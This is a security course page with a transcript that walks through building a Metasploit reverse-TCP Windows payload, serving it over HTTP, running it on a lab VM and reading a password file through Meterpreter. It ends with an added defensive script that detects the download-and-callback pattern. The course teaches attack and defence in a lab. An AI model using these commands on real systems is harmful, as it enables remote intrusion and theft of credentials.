
How To: Windows App Malware

Developed with
QA

Overview

Difficulty: Beginner
Duration: 24m
Students: 7

Course Description

This module looks at weaponisation, that is, how hacking exploits are created and disguised. The software simulations cover the creation of mobile and desktop payloads.

  • Weaponisation
  • Obfuscation
  • Encryption
  • Ciphers
  • Desktop Malware
  • Mobile Malware
  • Windows App Malware Creation
  • Mobile Malware Creation

Intended Audience

Although often perceived as an IT issue, cyber security is in fact a subject relevant to all business units. Cyber Primer is aimed at anyone with an interest in cyber security, whether they are looking to pursue a career as a penetration tester or just want to get a feel for the world of cyber security.

Prerequisites

There are no prerequisites for this course; however, participants are expected to have a basic understanding of computers and the internet.

Feedback

We welcome all feedback and suggestions. Please contact us at qa.elearningadmin@qa.com to let us know what you think.

Transcript

The Windows operating system is the most widely used operating system on personal computers. In this video you're going to see how we can create a payload to launch on a Windows application to exfiltrate information from a victim machine. To create a Windows app payload we're going to need to have a Kali Linux image open. I'm using my VirtualBox image and I've already got my image launched. We're going to use the Metasploit framework pre-installed in Kali to generate the payload for us to use. Metasploit is a database full of vulnerabilities and payloads and is regularly updated with recently found vulnerabilities for penetration testers and security professionals to test out.

Select the terminal and type msfconsole -r. I'm going to direct it to a handler called handler.rc, which has the instructions to start a listener. You can find the handler I've used in the notes section of this video. The handler file contains the commands used to start the listener and can be viewed in a text editor. The listener is now running.

Let's proceed to open another terminal. The shortcut for this is Control, Shift, T. This time we're going to create a payload. Type msfvenom -p windows/meterpreter/reverse_tcp. We're going to specify that the local host, or LHOST, equals 10.0.2.30. Now we're going to specify a local port, or LPORT, equals 4444. Now we're going to specify what type of file we want to create with the -f flag. We want an executable, so we have typed exe and provided an output file name, win_payload.exe. Pressing enter will go ahead and create that payload for us now. There's our file in the home folder.

Now we must get a web server running, so we're going to type python -m SimpleHTTPServer. I'm going to put it on port 80, the HTTP port. Now I have the server running. I'm now switching back over to a Windows system that is also running on VirtualBox.

I've opened up Internet Explorer and now I'm going to navigate to the web browser, or the web server, that we just created: 10.0.2.30. You can see it sharing all the files that we have available, but the file we're looking for is right down at the bottom: win_payload.exe. Let's click the file and run it. Now we can switch back over to Kali and you will see that there is traffic on both your web server but, most importantly, Kali. We have a Meterpreter session and our payload has initiated a reverse TCP handling session using the instructions specified.

We have a number of things that we can do from here to begin to investigate the machine, but what we will do is a search for a file, any file that may have passwords in it. We can use the search function by adding asterisks around our keyword to allow for other surrounding text in the file name. Pressing enter will now search the external file system over its reverse session to find any files that match our terms. We have one result. What we can do now is concatenate, or cat, that file to our screen. Now, the commands are slightly different here: even though we have the actual directory, we use double backslashes when addressing the external machine. Press enter on that command and what we should see is the content of the file itself displayed on the screen. Here it is, showing us that the file reads, "in here passwords are hiding, smiley face". Obviously real passwords hiding on a target, or other information that any particular hacker might want to exfiltrate and use, even for another part of a network attack, might be a bit more difficult to find, but this is the basics of using an application to launch an attack.

Here is the help. Here are the commands for Meterpreter sessions: information about audio controls, grabbing tokens, stealing password databases and dumping, et cetera. Meterpreter sessions are powerful, so investigate the help section and learn the commands.
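As an added example, not part of the course or its notes: a defender-side correlation check over constructed log lines that flags the footprint the walkthrough above leaves on a network, a workstation fetching an .exe from a bare-IP web server and then opening an outbound connection back to that same host on a different port (4444 here). The log format, the client addresses, the timestamps and the 10-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log (not from the course), one event per line:
# "<timestamp> <client> <server>:<port> <GET|CONNECT> <path or ->".
# 10.0.2.15 fetches win_payload.exe over HTTP, then calls back on 4444.
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.2.15 10.0.2.30:80 GET /win_payload.exe
2024-01-01T10:00:02 10.0.2.15 10.0.2.30:80 GET /index.html
2024-01-01T10:00:40 10.0.2.15 10.0.2.30:4444 CONNECT -
2024-01-01T10:05:00 10.0.2.16 10.0.2.30:80 GET /report.pdf
2024-01-01T10:06:00 10.0.2.16 10.0.2.30:4444 CONNECT -
2024-01-01T11:00:00 10.0.2.17 10.0.2.30:80 GET /tools.exe
2024-01-01T11:30:00 10.0.2.17 10.0.2.30:4444 CONNECT -
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+\.\d+\.\d+\.\d+) "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<port>\d+) (?P<kind>GET|CONNECT) (?P<detail>\S+)$"
)

def parse_events(log_text):
    """Parse the assumed log format into dicts, skipping lines that do not match."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        events.append({"ts": datetime.fromisoformat(d["ts"]), "src": d["src"],
                       "dst": d["dst"], "port": int(d["port"]),
                       "kind": d["kind"], "detail": d["detail"]})
    return sorted(events, key=lambda e: e["ts"])

def find_download_then_callback(log_text, window=timedelta(minutes=10)):
    """Return (client, server, exe_path, callback_port) for every .exe download
    that is followed within `window` by a connection from the same client to
    the same server on a port other than the one it downloaded from."""
    events = parse_events(log_text)
    downloads = [e for e in events
                 if e["kind"] == "GET" and e["detail"].lower().endswith(".exe")]
    alerts = []
    for dl in downloads:
        for ev in events:
            if (ev["kind"] == "CONNECT" and ev["src"] == dl["src"]
                    and ev["dst"] == dl["dst"] and ev["port"] != dl["port"]
                    and dl["ts"] <= ev["ts"] <= dl["ts"] + window):
                alerts.append((dl["src"], dl["dst"], dl["detail"], ev["port"]))
    return alerts
```

On the sample log only 10.0.2.15 is flagged: 10.0.2.16 fetched no executable, and 10.0.2.17's callback falls outside the window.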

About the Author


He comes from a systems administration and network architecture background, with a solid part of his career spent building networks for educational institutes. With security a mainstay of his implementations, he grew a strong passion for everything cyber orientated, especially social engineering. His educational experience led him to mentor young women in IT, helping them to begin a cyber career. He is a recipient of the Cisco Global Cyber Security Scholarship, a CCNA Cyber Ops holder, and was elected for the CCNP Cyber Ops program.